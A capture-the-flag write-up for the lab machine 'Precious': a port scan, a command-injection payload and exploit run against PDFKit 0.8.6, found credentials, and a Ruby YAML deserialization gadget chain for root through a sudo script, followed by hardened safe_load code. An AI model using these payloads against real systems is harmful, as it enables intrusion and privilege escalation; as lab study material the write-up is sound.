[Machines] [Easy] Precious: Ruby pdfkit RCE + Ruby YAML deserialization privilege escalation

Information Gathering

IP Address      Open Ports
10.10.11.189    TCP: 22, 80

ip='10.10.11.189'; itf='tun0'
if nmap -sn "$ip" | grep -q "Host is up"; then
    echo -e "\e[32m[+] Target $ip is up, scanning ports...\e[0m"
    ports=$(sudo masscan -p1-65535,U:1-65535 "$ip" --rate=1000 -e "$itf" | awk '/open/ {print $4}' | cut -d '/' -f1 | sort -n | tr '\n' ',' | sed 's/,$//')
    if [ -n "$ports" ]; then
        echo -e "\e[34m[+] Open ports found on $ip: $ports\e[0m"
        nmap -Pn -sV -sC -p "$ports" "$ip"
    else
        echo -e "\e[31m[!] No open ports found on $ip.\e[0m"
    fi
else
    echo -e "\e[31m[!] Target $ip is unreachable, network is down.\e[0m"
fi

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey: 
|   3072 845e13a8e31e20661d235550f63047d2 (RSA)
|   256 a2ef7b9665ce4161c467ee4e96c7c892 (ECDSA)
|_  256 33053dcd7ab798458239e7ae3c91a658 (ED25519)
80/tcp open  http    nginx 1.18.0
|_http-title: Did not follow redirect to http://precious.htb/
|_http-server-header: nginx/1.18.0
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Ruby && PDFKit v0.8.6 RCE

# echo '10.10.11.189 precious.htb'>>/etc/hosts

$ whatweb http://precious.htb/ -v

http://10.10.16.28/target.txt

$ ./exiftool q6whs0fu6nzcp86yervxcasxcxqofm8k.pdf

Generated by pdfkit v0.8.6

PDFKit v0.8.6 is a tool for generating PDF documents. It is not the JavaScript PDFKit but the Ruby one: it drives the wkhtmltopdf backend to build PDF documents from HTML and CSS. This version supports Ruby 2.5, 2.6, 2.7, 3.0 and 3.1.

https://security.snyk.io/vuln/SNYK-RUBY-PDFKIT-2869795

http%20`ping -c 1 10.10.16.28`

https://www.exploit-db.com/exploits/51293

$ python3 kit.py -s 10.10.16.28 443 -w http://precious.htb -p url

Ruby to henry

ruby@precious:~$ grep -iR henry

username:henry
password:Q3c1AqGHtoI0aXAYFH

User.txt

5122df0943bba969f407138e7456440a

Privilege Escalation: Ruby YAML deserialization

henry@precious:~$ sudo -l

# Compare installed dependencies with those specified in "dependencies.yml"
require "yaml"
require 'rubygems'

# TODO: update versions automatically
def update_gems()
end

def list_from_file
    YAML.load(File.read("dependencies.yml"))
end

def list_local_gems
    Gem::Specification.sort_by{ |g| [g.name.downcase, g.version] }.map{|g| [g.name, g.version.to_s]}
end

gems_file = list_from_file
gems_local = list_local_gems

gems_file.each do |file_name, file_version|
    gems_local.each do |local_name, local_version|
        if(file_name == local_name)
            if(file_version != local_version)
                puts "Installed version differs from the one specified in file: " + local_name
            else
                puts "Installed version is equals to the one specified in file: " + local_name
            end
        end
    end
end

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Insecure Deserialization/Ruby.md

Create a dependencies.yml file in a different directory: the program's YAML.load(File.read("dependencies.yml")) resolves the file name relative to the current working directory, so it loads the dependencies.yml from whichever directory the script is run in.

---
- !ruby/object:Gem::Installer
    i: x
- !ruby/object:Gem::SpecFetcher
    i: y
- !ruby/object:Gem::Requirement
  requirements:
    !ruby/object:Gem::Package::TarReader
    io: &1 !ruby/object:Net::BufferedIO
      io: &1 !ruby/object:Gem::Package::TarReader::Entry
          read: 0
          header: "abc"
      debug_output: &1 !ruby/object:Net::WriteAdapter
          socket: &1 !ruby/object:Gem::RequestSet
              sets: !ruby/object:Net::WriteAdapter
                  socket: !ruby/module 'Kernel'
                  method_id: :system
              git_set: /bin/bash
          method_id: :resolve

henry@precious:~$ sudo /usr/bin/ruby /opt/update_dependencies.rb

Root.txt

822a67160b990d37b78c84fb03256922
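The root cause on this box is the update script calling YAML.load on a file it reads from the caller's working directory. The following is an added example, not part of the writeup or of the box's /opt/update_dependencies.rb, showing the hardened form of list_from_file: YAML.safe_load with no permitted classes refuses any !ruby/object tag, the result is checked to be the plain name-to-version hash the script needs, and the file is read from a fixed path (the /opt/dependencies.yml location and the sample YAML are assumptions).

```ruby
require "yaml"

# Constructed sample in the shape the update script actually needs: gem name => version.
# Version strings with two dots stay strings under YAML's core schema.
BENIGN_DEPS = <<~YAML
  ---
  pdfkit: 0.8.6
  rake: 13.0.6
YAML

# Constructed sample carrying a !ruby/object tag of the kind YAML.load would instantiate.
TAGGED_DEPS = <<~YAML
  ---
  - !ruby/object:Gem::Installer
    i: x
YAML

# Assumed fixed location for the file; the original script reads it from whatever
# directory sudo was invoked in.
DEPENDENCIES_PATH = "/opt/dependencies.yml"

# Hardened replacement for list_from_file: safe_load only builds strings, numbers,
# arrays and hashes, refuses every !ruby/* tag, and rejects YAML aliases.
def parse_dependencies(yaml_text)
  data = YAML.safe_load(yaml_text, permitted_classes: [], permitted_symbols: [], aliases: false)
  unless data.is_a?(Hash) && data.all? { |name, ver| name.is_a?(String) && ver.is_a?(String) }
    raise ArgumentError, "dependencies.yml must map gem names to version strings"
  end
  data
end

def safe_list_from_file(path = DEPENDENCIES_PATH)
  parse_dependencies(File.read(path))
end

# Maps the loader's outcome to a symbol a caller can log or alert on:
# a tagged object raises Psych::DisallowedClass before any object is built.
def classify_dependencies(yaml_text)
  parse_dependencies(yaml_text)
  :accepted
rescue Psych::DisallowedClass, Psych::BadAlias, ArgumentError
  :rejected
end
```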
